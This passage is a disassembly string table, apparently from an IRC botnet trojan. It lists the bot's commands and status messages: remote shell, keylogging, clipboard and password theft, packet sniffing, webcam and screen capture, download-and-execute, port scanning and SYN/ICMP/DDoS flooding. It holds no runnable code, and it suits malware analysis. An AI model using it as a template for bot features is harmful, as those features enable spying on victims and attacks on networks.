aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40C50A+15AB�o
align 4
aCmd db '[CMD]',0 ; DATA XREF: sub_40C50A+15B0�o
align 10h
aWho db 'who',0 ; DATA XREF: sub_40C50A+15BB�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40C50A+15D4�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40C50A+15F6�o
aD_S db '%d. %s',0 ; DATA XREF: sub_40C50A+1603�o
align 4
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_40C50A+1637�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_40C50A+1648�o
aGc db 'gc',0 ; DATA XREF: sub_40C50A+165D�o
align 10h
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40C50A+5721�o
align 4
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_40C50A+574F�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_40C50A+1672�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_40C50A+1687�o
align 10h
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_40C50A+56F6�o
align 10h
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_40C50A:loc_411C1B�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_40C50A+169C�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_40C50A+16B1�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_40C50A+56D8�o
align 4
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_40C50A:loc_411BE9�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_40C50A:loc_411BF0�o
align 4
aCurrentip db 'currentip',0 ; DATA XREF: sub_40C50A+16C6�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_40C50A+16DB�o
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_40C50A+16F0�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_40C50A+1705�o
align 4
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_40C50A+55EF�o
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_40C50A+565A�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_40C50A+171A�o
align 10h
aHttp db 'http',0 ; DATA XREF: sub_40C50A+172F�o
align 4
aHttpdServerL_0 db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_40C50A+54B7�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5526�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_40C50A+1744�o
align 4
aTftp_0 db 'tftp',0 ; DATA XREF: sub_40C50A+1759�o
align 4
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_40C50A+5288�o
align 4
aTftpServerSt_0 db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_40C50A+5341�o
align 4
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_40C50A+53B0�o
aCrash db 'crash',0 ; DATA XREF: sub_40C50A+176E�o
align 10h
aMainCrashingBo db '[MAIN]: Crashing bot.',0 ; DATA XREF: sub_40C50A+1784�o
align 4
aCrash_0 db 'crash',0 ; DATA XREF: sub_40C50A+17BE�o
align 10h
aFindpass db 'findpass',0 ; DATA XREF: sub_40C50A+17D4�o
align 4
aFp db 'fp',0 ; DATA XREF: sub_40C50A+17E9�o
align 10h
aFindpassSearch db '[FINDPASS]: Searching for password.',0 ; DATA XREF: sub_40C50A+51EF�o
aFindpassFail_0 db '[FINDPASS]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5272�o
aFofofo2 db 'fofofo2',0 ; DATA XREF: sub_40C50A+17FE�o
aSfofofo2a db 'sfofofo2a',0 ; DATA XREF: sub_40C50A+1813�o
align 10h
aScanAlreadyD_0 db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_40C50A+4F29�o
align 4
aScanFailedTo_5 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_40C50A:loc_4116D5�o
align 4
aRandom_1 db 'Random',0 ; DATA XREF: sub_40C50A+50DA�o
align 4
aSequential_0 db 'Sequential',0 ; DATA XREF: sub_40C50A+50E1�o
align 10h
aScanSPortSca_0 db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_40C50A+510C�o
db 'for %d minutes using %d threads.',0
align 4
aScanFailedTo_4 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_40C50A+517D�o
align 4
aNick_0 db 'nick',0 ; DATA XREF: sub_40C50A+1839�o
align 10h
aN: ; DATA XREF: sub_40C50A+1850�o
unicode 0, <n>,0
aNickS_2 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4EC2�o
align 10h
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_40C50A+4ED0�o
align 10h
aJoin db 'join',0 ; DATA XREF: sub_40C50A+1867�o
align 4
aJ: ; DATA XREF: sub_40C50A+187E�o
unicode 0, <j>,0
aJoinSS_3 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4EA9�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_40C50A+4EB7�o
align 4
aPart_1 db 'part',0 ; DATA XREF: sub_40C50A+1895�o
align 4
aPt db 'pt',0 ; DATA XREF: sub_40C50A+18AC�o
align 4
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4E89�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_40C50A+4E97�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_40C50A+18C3�o
aR_2: ; DATA XREF: sub_40C50A+18DA�o
unicode 0, <r>,0
aS_30 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4E70�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_40C50A+4E7E�o
align 4
aKillthread db 'killthread',0 ; DATA XREF: sub_40C50A+18F1�o
align 4
aK: ; DATA XREF: sub_40C50A+1908�o
unicode 0, <k>,0
aAll db 'all',0 ; DATA XREF: sub_40C50A+4D8F�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_40C50A+4DA9�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_40C50A:loc_4112BD�o
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_40C50A+4DF9�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_40C50A:loc_41130A�o
align 10h
aC_quit db 'c_quit',0 ; DATA XREF: sub_40C50A+191F�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_40C50A+1936�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4D08�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_40C50A+194D�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_40C50A+1964�o
align 10h
aNickS_1 db 'NICK %s',0 ; DATA XREF: sub_40C50A+4CC6�o
aS_29 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4CDB�o
align 10h
aPrefix db 'prefix',0 ; DATA XREF: sub_40C50A+197B�o
align 4
aPr db 'pr',0 ; DATA XREF: sub_40C50A+1992�o
align 4
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_40C50A+4C84�o
align 10h
aOpen_0 db 'open',0 ; DATA XREF: sub_40C50A+19A9�o
align 4
aO: ; DATA XREF: sub_40C50A+19C0�o
unicode 0, <o>,0
aOpen_2 db 'open',0 ; DATA XREF: sub_40C50A+4C54�o
align 4
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_40C50A+4C65�o
align 10h
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_40C50A:loc_411179�o
aS3rv3rfg db 's3rv3rfg',0 ; DATA XREF: sub_40C50A+19D7�o
align 4
aS3rv3rfg2 db 's3rv3rfg2',0 ; DATA XREF: sub_40C50A+19EE�o
align 4
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_40C50A+4C3C�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_40C50A+1A05�o
aDn db 'dn',0 ; DATA XREF: sub_40C50A+1A1C�o
align 4
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_40C50A+4BB6�o
align 10h
aDnsLookupSS__0 db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_40C50A+4BE6�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0
; DATA XREF: sub_40C50A:loc_4110F7�o
align 10h
aKillproc db 'killproc',0 ; DATA XREF: sub_40C50A+1A33�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_40C50A+1A4A�o
align 10h
aProcProcessK_0 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_40C50A+4B7E�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_40C50A:loc_411092�o
aKill db 'kill',0 ; DATA XREF: sub_40C50A+1A61�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_40C50A+1A78�o
align 10h
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_40C50A+4B21�o
align 10h
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_40C50A:loc_411032�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40C50A+1A8F�o
align 4
aDel db 'del',0 ; DATA XREF: sub_40C50A+1AA6�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_40C50A+4AE0�o
align 10h
aFile_2 db '[FILE]:',0 ; DATA XREF: sub_40C50A:loc_410FF1�o
aGet_2 db 'get',0 ; DATA XREF: sub_40C50A+1ABD�o
aGt db 'gt',0 ; DATA XREF: sub_40C50A+1AD4�o
align 10h
aS_35 db '%s',0 ; DATA XREF: sub_40C50A+4A09�o
align 4
aDccSendFileSUs db '[DCC]: Send File: %s, User: %s.',0 ; DATA XREF: sub_40C50A+4A5B�o
aDccFailedToS_1 db '[DCC]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_40C50A+4ACA�o
align 4
aList_0 db 'list',0 ; DATA XREF: sub_40C50A+1AEB�o
align 4
aLi db 'li',0 ; DATA XREF: sub_40C50A+1B02�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_40C50A+49E9�o
align 4
aVisit db 'visit',0 ; DATA XREF: sub_40C50A+1B19�o
align 4
aV: ; DATA XREF: sub_40C50A+1B30�o
unicode 0, <v>,0
aVisitUrlS_ db '[VISIT]: URL: %s.',0 ; DATA XREF: sub_40C50A+495F�o
align 4
aVisitFailedToS db '[VISIT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_40C50A+49CE�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_40C50A+1B47�o
aMirc db 'mirc',0 ; DATA XREF: sub_40C50A+1B5E�o
align 4
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_40C50A+48E6�o
align 4
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_40C50A:loc_410DFA�o
align 4
aCmd_0 db 'cmd',0 ; DATA XREF: sub_40C50A+1B75�o
aCm db 'cm',0 ; DATA XREF: sub_40C50A+1B8C�o
align 4
asc_440414: ; DATA XREF: sub_40C50A+4892�o
dw 0Ah
unicode 0, <>,0
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_40C50A+48AA�o
align 10h
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_40C50A+48B5�o
aReadfile db 'readfile',0 ; DATA XREF: sub_40C50A+1BA3�o
align 10h
aRf db 'rf',0 ; DATA XREF: sub_40C50A+1BBA�o
align 4
aR_1: ; DATA XREF: sub_40C50A:loc_410CF9�o
unicode 0, <r>,0
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_40C50A+4856�o
align 4
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_40C50A+486A�o
align 4
aPsniff_0 db 'psniff',0 ; DATA XREF: sub_40C50A+1BD1�o
align 10h
aOn db 'on',0 ; DATA XREF: sub_40C50A+1BE6�o
align 4
aPsniffAlreadyR db '[PSNIFF]: Already running.',0 ; DATA XREF: sub_40C50A+1C06�o
align 10h
aPsniffCarnivor db '[PSNIFF]: Carnivore packet sniffer active.',0
; DATA XREF: sub_40C50A+1C6A�o
align 4
aPsniffFailedTo db '[PSNIFF]: Failed to start sniffer thread, error: <%d>.',0
; DATA XREF: sub_40C50A+1CD9�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40C50A+1CE4�o
aPsniffCarniv_0 db '[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_40C50A+1D07�o
align 10h
aPsniffNoCarniv db '[PSNIFF]: No Carnivore thread found.',0
; DATA XREF: sub_40C50A:loc_40E21B�o
align 4
aIdent db 'ident',0 ; DATA XREF: sub_40C50A+1D1E�o
align 10h
aOn_0 db 'on',0 ; DATA XREF: sub_40C50A+1D33�o
align 4
aIdentAlreadyRu db '[IDENT]: Already running.',0 ; DATA XREF: sub_40C50A+1D4F�o
align 10h
aIdentdServer_0 db '[IDENTD]: Server running on Port: 113.',0 ; DATA XREF: sub_40C50A+1D5F�o
align 4
aIdentdFailed_0 db '[IDENTD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_40C50A+1DAC�o
align 4
aOff_0 db 'off',0 ; DATA XREF: sub_40C50A+1DB7�o
aIdentServerSto db '[IDENT]: Server stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_40C50A+1DDA�o
align 10h
aIdentNoThreadF db '[IDENT]: No thread found.',0 ; DATA XREF: sub_40C50A:loc_40E2EE�o
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_40C50A+1DEE�o
align 4
aOn_1 db 'on',0 ; DATA XREF: sub_40C50A+1E03�o
align 4
aFile db 'file',0 ; DATA XREF: sub_40C50A+1E14�o
align 10h
aKeylogAlreadyR db '[KEYLOG]: Already running.',0 ; DATA XREF: sub_40C50A+1E76�o
align 4
aFile_0 db 'file',0 ; DATA XREF: sub_40C50A+1E8A�o
align 4
aKeylogKeyLog_0 db '[KEYLOG]: Key logger active.',0 ; DATA XREF: sub_40C50A+1EF4�o
align 4
aKeylogFailedTo db '[KEYLOG]: Failed to start logging thread, error: <%d>.',0
; DATA XREF: sub_40C50A+1F63�o
align 4
aOff_1 db 'off',0 ; DATA XREF: sub_40C50A+1E25�o
aKeylogKeyLogge db '[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_40C50A+1E48�o
align 4
aKeylogNoKeyLog db '[KEYLOG]: No key logger thread found.',0
; DATA XREF: sub_40C50A:loc_40E35C�o
align 10h
aNet db 'net',0 ; DATA XREF: sub_40C50A+1F70�o
aStart db 'start',0 ; DATA XREF: sub_40C50A+1FC7�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_40C50A+1FE7�o
align 10h
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_40C50A+2018�o
align 10h
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_40C50A:loc_40E52C�o
aStop db 'stop',0 ; DATA XREF: sub_40C50A+202D�o
align 4
aS_14 db '%s',0 ; DATA XREF: sub_40C50A+2048�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_40C50A+2050�o
align 10h
aS_15 db '%s',0 ; DATA XREF: sub_40C50A+206B�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_40C50A+2076�o
align 10h
aS_16 db '%s',0 ; DATA XREF: sub_40C50A+2091�o
align 4
aDelete_0 db 'delete',0 ; DATA XREF: sub_40C50A+209C�o
align 4
aS_17 db '%s',0 ; DATA XREF: sub_40C50A+20B7�o
align 10h
aShare db 'share',0 ; DATA XREF: sub_40C50A+20C2�o
align 4
aS_18 db '%s',0 ; DATA XREF: sub_40C50A+20EB�o
align 4
aS_19 db '%s',0 ; DATA XREF: sub_40C50A+2103�o
align 10h
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_40C50A+2135�o
align 10h
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_40C50A:loc_40E649�o
align 4
aUser_2 db 'user',0 ; DATA XREF: sub_40C50A+214A�o
align 4
aS_20 db '%s',0 ; DATA XREF: sub_40C50A+2183�o
align 4
aS_21 db '%s',0 ; DATA XREF: sub_40C50A+21AA�o
align 4
aS_22 db '%s',0 ; DATA XREF: sub_40C50A+21BB�o
align 10h
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_40C50A+21ED�o
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_40C50A:loc_40E6FE�o
align 4
aSend_1 db 'send',0 ; DATA XREF: sub_40C50A+21FC�o
align 10h
aS_23 db '%s',0 ; DATA XREF: sub_40C50A+222C�o
align 4
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_40C50A:loc_40E746�o
align 4
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_40C50A:loc_40E74D�o
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_40C50A+1F94�o
aCapture db 'capture',0 ; DATA XREF: sub_40C50A+2291�o
aCap db 'cap',0 ; DATA XREF: sub_40C50A+22A8�o
aScreen db 'screen',0 ; DATA XREF: sub_40C50A:loc_410AB6�o
align 4
aCaptureScreenC db '[CAPTURE]: Screen capture saved to: %s.',0 ; DATA XREF: sub_40C50A+45E5�o
aCaptureErrorWh db '[CAPTURE]: Error while capturing screen.',0
; DATA XREF: sub_40C50A:loc_410AFF�o
align 4
aCaptureNoFilen db '[CAPTURE]: No filename specified for screen capture.',0
; DATA XREF: sub_40C50A:loc_410B06�o
align 10h
aDrivers db 'drivers',0 ; DATA XREF: sub_40C50A:loc_410B19�o
aCaptureDriverD db '[CAPTURE]: Driver #%d - %s - %s.',0 ; DATA XREF: sub_40C50A+4663�o
align 4
aCaptureDriverL db '[CAPTURE]: Driver list complete.',0 ; DATA XREF: sub_40C50A+4699�o
align 10h
aFrame db 'frame',0 ; DATA XREF: sub_40C50A:loc_410BB0�o
align 4
aCaptureWebcamC db '[CAPTURE]: Webcam capture saved to: %s.',0 ; DATA XREF: sub_40C50A+4722�o
aCaptureError_0 db '[CAPTURE]: Error while capturing from webcam.',0
; DATA XREF: sub_40C50A:loc_410C3C�o
align 10h
aCaptureInvalid db '[CAPTURE]: Invalid parameters for webcam capture.',0
; DATA XREF: sub_40C50A:loc_410C43�o
align 4
aVideo db 'video',0 ; DATA XREF: sub_40C50A:loc_410C56�o
align 4
aCaptureAmateur db '[CAPTURE]: Amateur video saved to: %s.',0 ; DATA XREF: sub_40C50A+47D1�o
align 4
aCaptureError_1 db '[CAPTURE]: Error while capturing amateur video from webcam.',0
; DATA XREF: sub_40C50A:loc_410CE5�o
aCaptureInval_0 db '[CAPTURE]: Invalid parameters for amateur video capture.',0
; DATA XREF: sub_40C50A:loc_410CEF�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_40C50A+22BF�o
aGh db 'gh',0 ; DATA XREF: sub_40C50A+22D6�o
align 4
aSSSS_1 db '%s %s %s :%s',0 ; DATA XREF: sub_40C50A+4510�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_40C50A+4537�o
align 4
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_40C50A+4553�o
align 4
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_40C50A+458E�o
align 10h
aAddalias db 'addalias',0 ; DATA XREF: sub_40C50A+22FF�o
align 4
aAa db 'aa',0 ; DATA XREF: sub_40C50A+2316�o
align 10h
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_40C50A+44B8�o
align 4
aPrivmsg_2 db 'privmsg',0 ; DATA XREF: sub_40C50A+232D�o
aPm_0 db 'pm',0 ; DATA XREF: sub_40C50A+2344�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_40C50A+447D�o
align 4
aAction db 'action',0 ; DATA XREF: sub_40C50A+235B�o
align 4
aA_1: ; DATA XREF: sub_40C50A+2372�o
unicode 0, <a>,0
dword_440C00 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40C50A+4408�o
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_40C50A+4427�o
aCycle db 'cycle',0 ; DATA XREF: sub_40C50A+2389�o
align 4
aCy db 'cy',0 ; DATA XREF: sub_40C50A+23A0�o
align 10h
a332_2 db '332',0 ; DATA XREF: sub_40C50A+436E�o
aPartS_0 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4385�o
align 10h
aJoinSS_2 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+43B2�o
align 10h
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_40C50A+43BF�o
align 10h
aMode db 'mode',0 ; DATA XREF: sub_40C50A+23B7�o
align 4
aM: ; DATA XREF: sub_40C50A+23CE�o
unicode 0, <m>,0
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4348�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_40C50A+4356�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_40C50A+23E5�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_40C50A+23FC�o
aS_28 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4300�o
align 4
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_40C50A+431F�o
align 4
aC_mode db 'c_mode',0 ; DATA XREF: sub_40C50A+2413�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_40C50A+242A�o
aModeS db 'MODE %s',0 ; DATA XREF: sub_40C50A+425F�o
aS_27 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4295�o
align 4
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_40C50A+42B4�o
align 10h
aC_nick db 'c_nick',0 ; DATA XREF: sub_40C50A+2441�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_40C50A+2458�o
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_40C50A+41D4�o
aS_26 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+4209�o
align 4
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_40C50A+422A�o
align 4
aC_join db 'c_join',0 ; DATA XREF: sub_40C50A+246F�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_40C50A+2486�o
aJoinSS_1 db 'JOIN %s %s',0 ; DATA XREF: sub_40C50A+418F�o
align 4
aS_25 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+41C4�o
align 4
aC_part db 'c_part',0 ; DATA XREF: sub_40C50A+249D�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_40C50A+24B4�o
aPartS db 'PART %s',0 ; DATA XREF: sub_40C50A+4125�o
aS_24 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+415A�o
align 10h
aRepeat db 'repeat',0 ; DATA XREF: sub_40C50A+24CB�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_40C50A+24E2�o
align 4
a332_1 db '332',0 ; DATA XREF: sub_40C50A+405C�o
aRepeat_0 db 'repeat',0 ; DATA XREF: sub_40C50A+408A�o
align 4
aSSSS_0 db '%s %s %s :%s',0 ; DATA XREF: sub_40C50A+40B5�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_40C50A+40DB�o
align 4
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_40C50A:loc_41061C�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_40C50A+24F9�o
align 4
aDe db 'de',0 ; DATA XREF: sub_40C50A+2510�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_40C50A+3FC1�o
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_40C50A+4002�o
align 4
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_40C50A:loc_41054C�o
align 4
aFalehupd db 'falehupd',0 ; DATA XREF: sub_40C50A+2527�o
align 4
aUfalehupdp db 'ufalehupdp',0 ; DATA XREF: sub_40C50A+253E�o
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40C50A+3E92�o
align 10h
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_40C50A+3F38�o
align 4
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3FA7�o
aUpdateBotIdMus db '[UPDATE]: Bot ID must be different than current running process.',0
; DATA XREF: sub_40C50A:loc_4104BB�o
align 4
aExecute db 'execute',0 ; DATA XREF: sub_40C50A+2555�o
aE: ; DATA XREF: sub_40C50A+256C�o
unicode 0, <e>,0
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_40C50A+3E28�o
align 10h
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_40C50A+3E33�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_40C50A+2583�o
align 4
aFf_0 db 'ff',0 ; DATA XREF: sub_40C50A+259A�o
align 4
aFindfileSear_0 db '[FINDFILE]: Searching for file: %s in: %s.',0
; DATA XREF: sub_40C50A+3D26�o
align 4
aFindfileFailed db '[FINDFILE]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3DA0�o
aRename db 'rename',0 ; DATA XREF: sub_40C50A+25B1�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_40C50A+25C8�o
align 4
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_40C50A+3C70�o
align 4
aFile_1 db '[FILE]:',0 ; DATA XREF: sub_40C50A:loc_410192�o
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_40C50A+25DF�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_40C50A+25F6�o
align 4
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_40C50A+3BCA�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3C44�o
align 10h
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_40C50A:loc_410158�o
align 4
aClone_0 db 'clone',0 ; DATA XREF: sub_40C50A+261F�o
align 4
aC: ; DATA XREF: sub_40C50A+2636�o
unicode 0, <c>,0
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_40C50A+3AE4�o
align 4
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3B53�o
align 4
aDdos_syn_0 db 'ddos.syn',0 ; DATA XREF: sub_40C50A+264D�o
align 10h
aDdos_ack_0 db 'ddos.ack',0 ; DATA XREF: sub_40C50A+2664�o
align 4
aDdos_random_0 db 'ddos.random',0 ; DATA XREF: sub_40C50A+267B�o
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_40C50A+39E4�o
align 4
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3A5C�o
align 4
aSynflood db 'synflood',0 ; DATA XREF: sub_40C50A+2692�o
align 4
aSyn_0 db 'syn',0 ; DATA XREF: sub_40C50A+26A9�o
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_40C50A+38D5�o
align 4
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+394F�o
align 4
aFalehdownl db 'falehdownl',0 ; DATA XREF: sub_40C50A+26C0�o
align 4
aFalehdownl2 db 'falehdownl2',0 ; DATA XREF: sub_40C50A+26D7�o
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_40C50A+37F6�o
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3865�o
align 4
aRedirect_0 db 'redirect',0 ; DATA XREF: sub_40C50A+26EE�o
